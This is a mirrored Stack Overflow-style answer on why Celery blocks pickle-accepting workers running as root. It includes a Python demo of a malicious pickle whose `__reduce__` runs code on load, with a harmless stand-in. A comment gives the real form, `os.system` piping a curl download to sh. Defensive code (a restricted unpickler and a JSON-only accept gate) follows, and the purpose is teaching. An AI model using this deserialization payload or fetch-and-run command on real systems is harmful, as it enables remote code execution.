Question

In Celery 3.1+ there is a new security feature that won't allow you to start Celery if you are running the daemon as superuser.

My question is: why specifically is running Celery workers that accept pickled strings so bad that Celery would now introduce a feature where an environment variable must be explicitly set for it to be allowed?

Thanks


Solution

pickle simply isn't secure:

The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

As such, the Celery team has decided that its users need to be explicit that they wish to accept pickled data.
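
To make the quoted warning concrete, here is an added example (not code from the question, the answer, or the Celery project). It shows three things: a pickled task body that runs a function of the attacker's choosing the moment a worker unpickles it (`os.getpid` stands in for `os.system` so the demo is harmless), a restricted unpickler that refuses any global not on an allow-list, and a content-type gate that models what Celery's `accept_content` setting does when it is set to `['json']`. The `worker_receives` function and the `Exploit` class are hypothetical names for illustration; `application/x-python-serialize` is the content type kombu uses for pickle bodies.

```python
"""Why a worker that unpickles untrusted task bodies is arbitrary code execution."""
import io
import json
import os
import pickle

# Content types as they appear on messages in the broker queue.
CONTENT_TYPE_PICKLE = "application/x-python-serialize"  # kombu's pickle content type
CONTENT_TYPE_JSON = "application/json"


class Exploit:
    """Hypothetical attacker object (constructed for this example).

    pickle does not serialise the class; it serialises whatever __reduce__
    returns, i.e. (callable, args).  pickle.loads() then *calls* that
    callable on the receiving side.  os.getpid keeps the demo harmless; an
    attacker would return (os.system, ("curl http://... | sh",)) instead.
    """

    def __reduce__(self):
        return (os.getpid, ())


def build_malicious_body() -> bytes:
    """Bytes an attacker who can write to the broker queue would send."""
    return pickle.dumps(Exploit())


def benign_body() -> bytes:
    """A plain dict/list task body (constructed sample); needs no globals."""
    return pickle.dumps({"task": "add", "args": [1, 2]})


def unsafe_load(body: bytes):
    """What a worker that accepts pickle does: the payload's callable runs here."""
    return pickle.loads(body)


def payload_runs_in_loader() -> bool:
    """True when loading the attacker's body executed os.getpid() in this process."""
    return unsafe_load(build_malicious_body()) == os.getpid()


# Allow-list for the restricted loader.  Plain dicts, lists and strings are
# encoded with opcodes that never touch find_class; builtins.set is listed
# only because older protocols pickle sets through that global.
ALLOWED_GLOBALS = frozenset({("builtins", "set")})


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses to resolve any module.name global that is not explicitly allowed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_load(body: bytes):
    return RestrictedUnpickler(io.BytesIO(body)).load()


def restricted_load_rejects(body: bytes) -> bool:
    """True when the restricted loader refuses the body instead of running it."""
    try:
        restricted_load(body)
    except pickle.UnpicklingError:
        return True
    return False


def worker_receives(body: bytes, content_type: str, accept=(CONTENT_TYPE_JSON,)):
    """Hypothetical model of a worker's accept_content check.

    Returns ("accepted", obj) or ("rejected", reason).  With the default
    accept list the pickle body is dropped before a single byte is unpickled,
    which is the effect of `accept_content = ['json']` in Celery.
    """
    if content_type not in accept:
        return ("rejected", f"content type {content_type!r} not in {list(accept)}")
    if content_type == CONTENT_TYPE_JSON:
        return ("accepted", json.loads(body))
    if content_type == CONTENT_TYPE_PICKLE:
        return ("accepted", pickle.loads(body))  # only reachable if explicitly allowed
    return ("rejected", f"no deserializer for {content_type!r}")


if __name__ == "__main__":
    print("pickle body ran a function in this process:", payload_runs_in_loader())
    print("restricted loader rejects it:", restricted_load_rejects(build_malicious_body()))
    print("json-only worker:", worker_receives(build_malicious_body(), CONTENT_TYPE_PICKLE))
```

The first check is the whole point of the answer: the worker never "executes" the message on purpose, yet a callable chosen by whoever wrote to the queue runs with the worker's privileges, which is why doing that as root is so much worse. The restricted unpickler is the Python documentation's mitigation pattern and is still only as good as its allow-list; refusing the pickle content type altogether, as the `accept_content` gate does, is the simpler and safer choice.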

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow